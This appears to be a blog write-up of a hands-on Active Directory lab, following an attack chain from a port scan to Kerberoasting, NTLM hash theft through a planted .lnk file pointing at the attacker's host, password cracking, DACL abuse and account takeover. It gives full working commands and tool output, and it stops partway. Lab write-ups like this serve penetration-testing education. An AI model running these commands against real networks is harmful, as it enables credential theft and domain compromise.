Press enter or click to view image in full size
Can an application for public service requests lead to full domain compromise? You would probably say no. But you’re wrong. And I am going to show you why.
● Discovering the service account
We were given only an IP address to start from. So I launched a scan to see which ports were open and which services were available.
rustscan -a 10.1.65.124 -- -AI used rustscan because I like the option to pass nmap flags directly for the open ports. The scan revealed the following results:
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: City Hall - Your Local Government
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-04-07 16:20:34Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: city.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: city.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-CC.city.local
| Issuer: commonName=DC-CC.city.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-26T17:26:36
| Not valid after: 2026-08-28T17:26:36
| MD5: 6b9a:3a36:385d:f60a:43ef:3281:cafa:50fb
| SHA-1: b9ad:bca4:bad8:52b8:732f:3307:7b4b:d035:f389:3ce2
| -----BEGIN CERTIFICATE-----
...
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: CITY
| NetBIOS_Domain_Name: CITY
| NetBIOS_Computer_Name: DC-CC
| DNS_Domain_Name: city.local
| DNS_Computer_Name: DC-CC.city.local
| DNS_Tree_Name: city.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-07T16:21:30+00:00
|_ssl-date: 2026-04-07T16:21:41+00:00; 0s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open msrpc syn-ack Microsoft Windows RPC
49680/tcp open msrpc syn-ack Microsoft Windows RPC
49698/tcp open msrpc syn-ack Microsoft Windows RPC
49709/tcp open msrpc syn-ack Microsoft Windows RPC
49716/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC-CC; OS: Windows; CPE: cpe:/o:microsoft:windowsAfter adding the corresponding entries to /etc/hosts, I started with the most interesting items I found, the shared drives (port 445) and the website (port 80).
Unfortunately, anonymous login didn’t reveal any shared drive, so I had to leave that for the moment.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $smbclient -L \\\\city.localPassword for [WORKGROUP\rootshellace]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to city.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Since I didn’t get anything useful, I started browsing the website, looking for possible attack paths. An initial scan with gobuster revealed a sub-directory named uploads. This was useful in a later step.
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 24118]
/uploads (Status: 301) [Size: 149] [--> http://city.local/uploads/]
Progress: 4614 / 4615 (99.98%)The website didn’t look very interesting until I got to a page where you could download an application, for both Linux and Windows, to submit various form requests. The executables were available here: http://city.local/documents-forms.html.
I ran strings on both files, in an attempt to find possible hard-coded elements. I found a token and something looking like a hash, but couldn’t do anything with them.
The next step I took was to simulate submitting a dummy request from the app and see what happens. Now, here is where I found the first handy item. The application had a logging screen and the name of a used service account was displayed.
[20:12:06] Application form loaded. Please complete all required fields.
[20:12:06] Service: Public Works Service Request
[20:12:06] System ready for form validation and processing.
[20:12:59] Validating application form...
[20:12:59] Connecting to City Council Directory Services...
[20:12:59] Using dedicated service account: svc_services_portal
[20:13:01] Performing LDAP bind request - Portal Service Authentication...
[20:13:02] Performing Search: citizen records database...
[20:13:03] Performing Validate: application eligibility criteria...
[20:13:04] Performing Update: service request tracking system...
[20:13:05] Performing Log: public services audit trail...
[20:13:05] Performing Verify: resident information consistency...
[20:13:06] Performing Process: automated workflow routing...
[20:13:07] Performing Update: municipal service database...
[20:13:07] Authenticating service account with DC-CC.city.local...
[20:13:07] ✓ Directory service authentication completed
[20:13:07] ✓ Application validated successfully
[20:13:07] ✓ Service request processed and logged
[20:13:07] ✓ Workflow routing completed
[20:13:07] ✓ Database update successfulI tested svc_services_portal user with an empty password. The test failed, but it confirmed I got a valid user.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u svc_services_portal -p ''SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [-] city.local\svc_services_portal: STATUS_LOGON_FAILURE
● Obtaining the password for the service account
I initially tried to use as a password the token I found using strings, but it didn’t work. So, how do we get the password?
Since the authentication was done automatically when executing the app locally, I intercepted the traffic using Wireshark, then followed the corresponding stream and got the password for the service account.
Press enter or click to view image in full size
I tested the credential pair and got the confirmation that they are valid.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u svc_services_portal -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\svc_services_portal:<REDACTED> ● Get the Active Directory structure using BloodHound
Having a valid pair of credentials, I used it to get an idea of how Active Directory was structured for that entity.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $bloodhound-python -u svc_services_portal -p <REDACTED> -ns 10.1.65.124 -d city.local -c AllOnce I obtained the archive containing the .json files, I imported it in BloodHound. I checked if svc_services_portal had any interesting permissions or was part of any useful groups, but nothing came up.
This account looked like a dead end, so I moved on checking if there were any Kerberoastable users. I found clerk.john.
Press enter or click to view image in full size
● Get access as clerk.john
The first step was to get the Kerberos hash for this user. I used GetUserSPNs script from impacket.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $impacket-GetUserSPNs city.local/svc_services_portal:<REDACTED> -dc-ip 10.1.65.124 -requestOnce I got it, I passed it to john to crack it.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt john_clerk_hash_krb.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (?)
1g 0:00:00:02 DONE (2026-04-07 21:37) 0.3816g/s 729306p/s 729306c/s 729306C/s clouds96..clenol
Use the "--show" option to display all of the cracked passwords reliably
Session completed. To make sure the password was OK, I tested the credentials.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u clerk.john -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\clerk.john:<REDACTED> I went back to BloodHound to verify this new user, but it didn’t have any useful access.
● Get access as jon.peters
Because BloodHound didn’t reveal any lead, I went back to the shared drives and enumerated again, this time as clerk.john.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $smbclient -L \\city.local -U clerk.john
Password for [WORKGROUP\clerk.john]: Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Uploads Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to city.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Well, better than anonymous login, at least I had something to work with. On Backups drive I got a Permission Denied error when attempting to connect, but I was able to map the Uploads directory. Inside, among other files, I found an email from Emma Hayes. It was mentioned that write access was granted to Jon Peters on this drive and NTLM authentication was used.
The next step was to start a listener, with responder, on the VPN interface I was using for the challenge.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $sudo responder -I tun0Then, I created a fake .lnk file, using ntlm_theft.py - available here
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $python3 ~/Tools/ntlm_theft/ntlm_theft.py -g lnk -s <MY_VPN_IP> -f fake_noteFinally, I deployed it on the Uploads shared drive. After a couple of seconds, in the terminal where the listener was launched, I got the NTLMv2 hash for jon.peters.
[SMB] NTLMv2-SSP Client : 10.1.65.124
[SMB] NTLMv2-SSP Username : CITY\jon.peters
[SMB] NTLMv2-SSP Hash : <REDACTED>I went back to john, to crack this new hash and obtain the corresponding password.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $john jon_peters_ntlm_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (jon.peters)
1g 0:00:00:10 DONE (2026-06-26 15:28) 0.09451g/s 1260Kp/s 1260Kc/s 1260KC/s 1234ถ6789..1234dork
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. Again, I wanted to verify if the login was OK.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u jon.peters -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\jon.peters:<REDACTED> I got the confirmation that everything was fine with the access for this user.
● Lateral movement to nina.soto
Since I obtained a new set of credentials, I returned to BloodHound to see what I could find. Still no useful group membership, but jon.peters had GenericWrite access on 3 different users: maria.clerk, paul.roberts and nina.soto .
Press enter or click to view image in full size
I used targetedKerberoast.py tool (available here) to obtain the Kerberos hash for these 3 users.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $~/Tools/targetedKerberoast/targetedKerberoast.py -v -d 'city.local' -u 'jon.peters' -p '<REDACTED>' --dc-ip 10.1.65.124Then, passed all 3 hashes to john, for cracking.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $john --format=krb5tgs three_hash_krb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<MARIA_PWD_REDACTED> (?)
<NINA_PWD_REDACTED> (?)
2g 0:00:00:20 DONE (2026-06-26 15:58) 0.09652g/s 692266p/s 1614Kc/s 1614KC/s !!12Honey..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. I was able to get the passwords only for 2 of the 3 users. However, it was something I could work with. But I had to test them before, to confirm they were OK, and the confirmation came.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u maria.clerk -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\maria.clerk:<REDACTED>
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u nina.soto -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\nina.soto:<REDACTED> ● Pivoting from emma.hayes to sam.brooks and getting the user flag
Join Medium for free to get updates from this writer.
I reexamined the shared drive permissions, this time with the 2 new found accounts. Although maria.clerk didn’t have anything interesting, for nina.soto , I noticed there was read access on Backups.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $smbmap -u nina.soto -p <REDACTED> -H city.local ________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.1.65.124:445 Name: city.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Uploads NO ACCESS
[*] Closed 1 connections
I connected to that shared drive and found some backup profiles for clerk.john and sam.brooks. I downloaded them on my local machine. Initially, the download of the file for clerk.john was failing due to a timeout error, but I managed to fix this by adding -m SMB2 parameter to the initial smbclient command.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $smbclient \\\\city.local\\Backups -U nina.soto
Password for [WORKGROUP\nina.soto]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Oct 30 18:55:14 2025
.. D 0 Thu Oct 30 18:55:14 2025
Documents Backup Dn 0 Thu Oct 30 18:55:14 2025
UserProfileBackups Dn 0 Thu Oct 30 20:55:27 2025 12966143 blocks of size 4096. 8391255 blocks available
smb: \> cd UserProfileBackups
smb: \UserProfileBackups\> dir
. Dn 0 Thu Oct 30 20:55:27 2025
.. Dn 0 Thu Oct 30 20:55:27 2025
clerk.john_ProfileBackup_0729.wim An 69883158 Thu Oct 30 18:23:22 2025
sam.brooks_ProfileBackup_0728.wim A 130326 Thu Oct 30 20:55:12 2025
12966143 blocks of size 4096. 8391254 blocks available
smb: \UserProfileBackups\> get sam.brooks_ProfileBackup_0728.wim
getting file \UserProfileBackups\sam.brooks_ProfileBackup_0728.wim of size 130326 as sam.brooks_ProfileBackup_0728.wim (90,4 KiloBytes/sec) (average 90,4 KiloBytes/sec)
smb: \UserProfileBackups\> get clerk.john_ProfileBackup_0729.wim
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: \UserProfileBackups\> getting file \UserProfileBackups\clerk.john_ProfileBackup_0729.wim of size 69883158 as clerk.john_ProfileBackup_0729.wim SMBecho failed (NT_STATUS_CONNECTION_DISCONNECTED). The connection is disconnected now
To see what was available on those 2 profiles, I installed wimtools. You could either extract them locally, or map them. I chose to extract them, then navigated through the available content.
Inside the profile of sam.brooks, I found an email mentioning web_admin account, which was moved to Quarantine OU due to some security concerns. Also, another mention was made related to the web server, which had ASP.NET enabled and file uploads of .aspx pages were possible. This helped me later.
For clerk.john, I found another email from Emma Hayes, where she mentioned she would share her credentials to be used for urgent tasks while she was on vacation. Those were stored in Credential Manager. I found some corresponding key files, but also the PowerShell History file for the console log. After examining it, I got the plaintext credentials of emma.hayes.
cmdkey /add:city-dc /user:city.local\emma.hayes /pass:<REDACTED>
cmdkey /add:DC-CC.city.local /user:emma.hayes /pass:<REDACTED>Of course, I tested the connection with the new pair and got the confirmation that it was all good.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u emma.hayes -p <REDACTED>
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\emma.hayes:<REDACTED> Back to BloodHound, looking for useful access on Emma. Over there, I found out she had WriteDacl rights on CityOps OU and 3 other users: sam.brooks , alex.king and rita.cho . I used that permission to grant FullControl for her on CityOps , using dacledit.py .
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $sudo ./dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'emma.hayes' -target-dn 'OU=CITYOPS,DC=CITY,DC=LOCAL' 'city.local'/'emma.hayes':<REDACTED>Then, I looked over all those 3 users under CityOps OU and their permissions. The one that proved to be the most useful was sam.brooks , because it was part of Remote Management Users. First, I had to enable it, since it was disabled.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $bloodyAD --host 10.1.65.124 -d 'city.local' -u 'emma.hayes' -p <REDACTED> remove uac 'sam.brooks' -f ACCOUNTDISABLE
[+] ['ACCOUNTDISABLE'] property flags removed from sam.brooks's userAccountControlNext, I reset the password for this account, using the same tool as previously, bloodyAD.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $bloodyAD -u 'emma.hayes' -p <REDACTED> -d 'city.local' --host 10.1.65.124 set password 'sam.brooks' 'Password123'
[+] Password changed successfully!Finally, I tested it and made sure the credentials were valid.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $netexec smb city.local -u sam.brooks -p Password123
SMB 10.1.65.124 445 DC-CC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-CC) (domain:city.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.65.124 445 DC-CC [+] city.local\sam.brooks:Password123 Since this user was a member of Remote Management Users, I connected to the machine using evil-winrm and got the user flag located on Desktop.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $evil-winrm -i 10.1.65.124 -u sam.brooks -p Password123 Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sam.brooks\Documents> whoami
city\sam.brooks
*Evil-WinRM* PS C:\Users\sam.brooks\Documents> dir
*Evil-WinRM* PS C:\Users\sam.brooks\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\sam.brooks\Desktop> dir
Directory: C:\Users\sam.brooks\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/24/2025 11:57 AM 1594 user.txt
*Evil-WinRM* PS C:\Users\sam.brooks\Desktop> type user.txt
<REDACTED_FLAG>
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡰⠚⠉⠀⠀⠉⠑⢦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠞⠀⠀⠀⠀⠀⠀⠀⠀⠱⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⡀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⡜⠀⠀⠀⠀⠀⣀⣀⠀⠀⠀⠀⠀⢣⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⣠⠔⠋⠉⣩⣍⠉⠙⠢⣄⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢧⡜⢏⠓⠒⠚⠁⠈⠑⠒⠚⣹⢳⡸⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠘⣆⠸⡄⠀⠀⠀⠀⠀⠀⢠⠇⣰⠃⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⡴⠚⠉⢣⡙⢦⡀⠀⠀⢀⡰⢋⡜⠉⠓⠦⣀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⡴⠁⢀⣀⣀⣀⣙⣦⣉⣉⣋⣉⣴⣋⣀⣀⣀⡀⠈⢧⠀⠀⠀⠀⠀
⠀⠀⠀⠀⡸⠁⠀⢸⠀⠀⠀⠀⢀⣔⡛⠛⡲⡀⠀⠀⠀⠀⡇⠀⠈⢇⠀⠀⠀⠀
⠀⠀⠀⢠⠇⠀⠀⠸⡀⠀⠀⠀⠸⣼⠽⠯⢧⠇⠀⠀⠀⠀⡇⠀⠀⠘⡆⠀⠀⠀
⠀⠀⠀⣸⠀⠀⠀⠀⡇⠀⠀⠀⠳⢼⡦⢴⡯⠞⠀⠀⠀⢰⠀⠀⠀⠀⢧⠀⠀⠀
⠀⠀⠀⢻⠀⠀⠀⠀⡇⠀⠀⠀⢀⡤⠚⠛⢦⣀⠀⠀⠀⢸⠀⠀⠀⠀⡼⠀⠀⠀
⠀⠀⠀⠈⠳⠤⠤⣖⣓⣒⣒⣒⣓⣒⣒⣒⣒⣚⣒⣒⣒⣚⣲⠤⠤⠖⠁⠀⠀⠀
⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
*Evil-WinRM* PS C:\Users\sam.brooks\Desktop>
● Move web_admin from Quarantine to CityOps and reset the password to get access to it
I remembered about the .aspx files for the web server. However, being connected as user sam.brooks didn’t allow me to upload the required file. I verified the permissions and concluded I needed access as web_admin.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ACL -Path .\test.aspx | Format-Table -Wrap Directory: C:\inetpub\wwwroot\uploads
Path Owner Access
---- ----- ------
test.aspx BUILTIN\Administrators BUILTIN\IIS_IUSRS Allow ReadAndExecute, Synchronize
CITY\web_admin Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadAndExecute, Synchronize
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ACL -Path . | Format-Table -Wrap
Directory: C:\inetpub\wwwroot
Path Owner Access
---- ----- ------
uploads BUILTIN\Administrators BUILTIN\IIS_IUSRS Allow ReadAndExecute, Synchronize
BUILTIN\IIS_IUSRS Allow ReadAndExecute, Synchronize
CITY\web_admin Allow Modify, Synchronize
BUILTIN\IIS_IUSRS Allow -1610612736
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow ReadAndExecute, Synchronize
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
I tried to get the Kerberos hash, but, unfortunately, couldn’t crack it. So I returned to what I saw in BloodHound for emma.hayes and started to investigate the permissions on those OUs.
First, I got the DistinguishedName property for the OUs.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ADOrganizationalUnit -Filter 'Name -eq "CITYOPS"' | Select Name, DistinguishedNameName DistinguishedName
---- -----------------
CityOps OU=CityOps,DC=city,DC=local
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ADOrganizationalUnit -Filter 'Name -eq "QUARANTINE"' | Select Name, DistinguishedName
Name DistinguishedName
---- -----------------
Quarantine OU=Quarantine,DC=city,DC=local
Then, I verified the access Emma had on those.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> (Get-Acl -Path "AD:\OU=Quarantine,DC=city,DC=local").Access | Where-Object 'IdentityReference' -like '*emma*' | Select ActiveDirectoryRights, InheritanceType, AccessControlType, IdentityReference, IsInherited | Format-Table -Wrap ActiveDirectoryRights InheritanceType AccessControlType IdentityReference IsInherited
--------------------- --------------- ----------------- ----------------- -----------
ReadProperty, WriteProperty, GenericExecute All Allow CITY\emma.hayes False
CreateChild, DeleteChild Descendents Allow CITY\emma.hayes False
CreateChild, DeleteChild All Allow CITY\emma.hayes False
CreateChild, DeleteChild Descendents Allow CITY\emma.hayes False
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> (Get-Acl -Path "AD:\OU=CityOps,DC=city,DC=local").Access | Where-Object 'IdentityReference' -like '*emma*' | Select ActiveDirectoryRights, InheritanceType, AccessControlType, IdentityReference, IsInherited | Format-Table -Wrap
ActiveDirectoryRights InheritanceType AccessControlType IdentityReference IsInherited
--------------------- --------------- ----------------- ----------------- -----------
GenericAll All Allow CITY\emma.hayes False
WriteDacl All Allow CITY\emma.hayes False
Next, I got the info about web_admin.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ADUser -Identity web_adminDistinguishedName : CN=Web Admin,OU=Quarantine,DC=city,DC=local
Enabled : True
GivenName :
Name : Web Admin
ObjectClass : user
ObjectGUID : d0eac22e-8e85-49d2-a287-dfdeabd35707
SamAccountName : web_admin
SID : S-1-5-21-407732331-1521580060-1819249925-1107
Surname :
UserPrincipalName : [email protected]
Finally, I got the access Emma had on it.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> (Get-Acl -Path "AD:\CN=Web Admin,OU=Quarantine,DC=city,DC=local").Access | Where-Object {$_.IdentityReference -like "*emma.hayes*"} | Select-Object ActiveDirectoryRights, InheritanceType, AccessControlType, IdentityReference, IsInherited | Format-Table ActiveDirectoryRights InheritanceType AccessControlType IdentityReference IsInherited
--------------------- --------------- ----------------- ----------------- -----------
CreateChild, DeleteChild All Allow CITY\emma.hayes True
CreateChild, DeleteChild All Allow CITY\emma.hayes True
CreateChild, DeleteChild All Allow CITY\emma.hayes True
ReadProperty, WriteProperty, GenericExecute All Allow CITY\emma.hayes True
I proceeded with moving web_admin from Quarantine to CityOps.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> $emma_pass = ConvertTo-SecureString <REDACTED> -AsPlainText -Force
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> $emma_cred = New-Object System.Management.Automation.PSCredential('city.local\emma.hayes', $emma_pass)
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Move-ADObject -Identity "CN=Web Admin,OU=Quarantine,DC=city,DC=local" -TargetPath "OU=CityOps,DC=city,DC=local" -Credential $emma_cred
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> Get-ADUser -Identity web_adminDistinguishedName : CN=Web Admin,OU=CityOps,DC=city,DC=local
Enabled : True
GivenName :
Name : Web Admin
ObjectClass : user
ObjectGUID : d0eac22e-8e85-49d2-a287-dfdeabd35707
SamAccountName : web_admin
SID : S-1-5-21-407732331-1521580060-1819249925-1107
Surname :
UserPrincipalName : [email protected]
Once that step was completed and verified, I reset the password and tested it.
┌─[rootshellace@parrot]─[~/HackSmarter/HandsOnLabs/ActiveDirectory/CityCouncil]
└──╼ $bloodyAD -u 'emma.hayes' -p <REDACTED> -d 'city.local' --host 10.1.65.124 set password 'web_admin' 'Password123'
[+] Password changed successfully!
